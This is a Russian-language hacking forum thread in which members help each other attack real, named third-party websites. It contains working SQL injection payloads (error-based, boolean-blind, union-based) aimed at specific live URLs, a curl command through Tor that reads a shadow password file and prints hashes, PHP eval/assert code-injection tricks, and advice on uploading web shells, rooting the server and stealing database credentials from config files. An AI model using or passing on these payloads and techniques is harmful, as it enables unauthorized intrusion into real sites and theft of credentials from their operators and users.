Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,014
    Likes Received:
    1,362
    Reputations:
    43
    Злой ваф
     
  2. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,505
    Likes Received:
    398
    Reputations:
    228
    может кто сможет обойти...
     
  3. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    376
    Likes Received:
    343
    Reputations:
    99
    Не стоит забывать, что иногда параметры можно передавать одинаково как через GET, так и через POST, в котором зачастую ничего не фильтруется!
    Code:
    POST /en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b HTTP/1.1
    Host: www.men-defencetec.de
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 94
    
    tx_men_pi1[detail]=(1)--~(select*from(select(concat_ws(0x3a,@@version,database(),user()))n)f)#
    
    Результат:
     
    Lam3rsha, Gorev, ZodiaX and 7 others like this.
  4. Simon_ru

    Simon_ru New Member

    Joined:
    4 Mar 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    assert(stripslashes($_REQUEST['p']));


    Подскажите кто-нибудь как через assert пролиться? Не пойму как он работает
     
    #1824 Simon_ru, 24 Mar 2017
    Last edited: 24 Mar 2017
  5. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    495
    Likes Received:
    870
    Reputations:
    312
    eval($_REQUEST[x]);&x=phpcredits();
     
    Gorev and Simon_ru like this.
  6. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    805
    Reputations:
    90
    Code:
    $ curl -s -k --proxy socks5://127.0.0.1:9150 'http://*.com/ajax/*.php?UserID=1+union+select+1,2,3,load_file%280x2f6574632f736861646f772e62616b%29,5,6,7,8,9%23' | perl -lane '~s/\\n/\n/g;print' | tail -n 2 | perl -lane '~/[^:]+:(.{15})/;print $1'
    $1$piXULrQ7$R3T
    $1$piXULrQ7$R3T
    
    shadow.bak
    :D
     
    _________________________
    cat1vo, BabaDook, crlf and 1 other person like this.
  7. l0mt1k

    l0mt1k New Member

    Joined:
    31 Mar 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Кто нибудь может показать пример нормального upload'a, через мой не хочет грузить на сервер шел. Тут проблема в одном из двух, либо я глуп и мал, либо проблема на стороне сервера:confused:
    P.s. с этим разобрался, в директории нет прав на запись. Можно-ли что-нибудь придумать с этим?
     
    #1827 l0mt1k, 1 Apr 2017
    Last edited: 1 Apr 2017
  8. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    можно. Можно к примеру попробовать рутнуть сервер.
    $uname -a

    p.s. а если нету прав - поискать где есть. к примеру папки с аватарками.
     
    #1828 ACat, 1 Apr 2017
    Last edited: 3 Apr 2017
  9. slva2000

    slva2000 New Member

    Joined:
    20 Nov 2009
    Messages:
    45
    Likes Received:
    2
    Reputations:
    0
    PHP:
    $var = $_POST['value'];
    $var = addslashes( $var );
    $var = stripslashes($var);
    $var = str_replace( "<?", "&lt;?", $var );
    $var = str_replace( "?>", "?&gt;", $var );
    $var = mysqli_real_escape_string($var);

    ############
    # v1.
    query( "UPDATE comment set text='$var');

    # v2.
    query( "INSERT INTO comment text='$var' WHERE id = '1');
    Ребят, есть варианты провести инъекцию?
     
  10. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    Вам в другой тред
     
  11. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    mysqli_real_escape_string
    а вы как думаете?
     
  12. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,505
    Likes Received:
    398
    Reputations:
    228
    помогите вывод сделать, тайм бейс не крутит(
    Code:
    https://www.denkmalschutz.de/denkmale-erleben/terminkalender.html?tx_igcalendar_pi1[termin][eventSuche]=1&tx_igcalendar_pi1[state]=118)+union/**//**//**/select+1+--+
     
  13. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    805
    Reputations:
    90
    вывод через union мне добиться не удалось, но там boolen есть
    Code:
    118)/**/AND/**/1=2+--+s' | grep 'event_417'
    
    
    118)/**/AND/**/1=1+--+s' | grep 'event_417'
                        <div class="event_417 event">
    
    
    хм что интересно функции substring,mid,right,left по какой то причине на работают.. но нормально работает like, версия базы 5.6

    Code:
    118)/**/AND/**/version()*1+like+%275.6%%27+--+s' | grep 'event_417'
                        <div class="event_417 event">
    
    к information_schema тоже доступ есть

    Code:
    118)/**/AND/**/(select+table_name+from+information_schema.tables+limit+1)+like+%27%%27+--+s' | grep 'event_417'
                        <div class="event_417 event">
    
    ещё там операция = не всегда работает, лучше юзать like
    скульмап по какой то причине в упор скулю не видит
    -----------
    чорт, там запятая фильтруется -_-
     
    _________________________
    #1833 t0ma5, 5 Apr 2017
    Last edited: 6 Apr 2017
    DezMond™ and Gorev like this.
  14. l0mt1k

    l0mt1k New Member

    Joined:
    31 Mar 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Ну если честно, upload там спокойно льётся через sqlmap, но если потом через этот upload лить shell, то он не выполняется, ощущение такое как будто нет поддержки php :/
     
  15. l0mt1k

    l0mt1k New Member

    Joined:
    31 Mar 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Именно
     
  16. l0mt1k

    l0mt1k New Member

    Joined:
    31 Mar 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    В общем, заливаю upload, через него заливаю шелл, открыв его сервер его не обрабатывает как php, а выводит просто текст с кодом.
    Хотя upload работает нормально.
    php
     
  17. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    http://www.websec.ca/blog/view/Bypassing_WAFs_with_SQLMap

    Стоп, что-то я не понял... Есть иньжект, sqlmap раскрутил его, залил через mysql в файл.php код и код не исполняется?
    Ааа, понял, в папке, куда залит шелл нету прав...

    Попробуй прочитать конфиг.php. Там будет логин и пароль подключения к БД.

    ssh [email protected]
     
    l0mt1k likes this.
  18. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    832
    Likes Received:
    805
    Reputations:
    90
    мимо, sqlmap не видит самую простую инъекцию and 1=1/and 1=2 впрочем даже если бы видел тамперы там не помогут, фильтруются запятые, плюс некоторые запросы чуть меняешь логику - не отрабатывают, там проще свой скрипт набросать
     
    _________________________
  19. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,505
    Likes Received:
    398
    Reputations:
    228
    чё можно сделать?
    Code:
    http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604'
     
  20. ZodiaX

    ZodiaX Reservists Of Antichat

    Joined:
    7 May 2009
    Messages:
    530
    Likes Received:
    297
    Reputations:
    46
    Code:
    http://www.mallorca-holiday-rentals.info/index.php?id=5&L=1&tx_fewo_mail%5Bobjref%5D=2604)+order+by+24+--+-
     
Loading...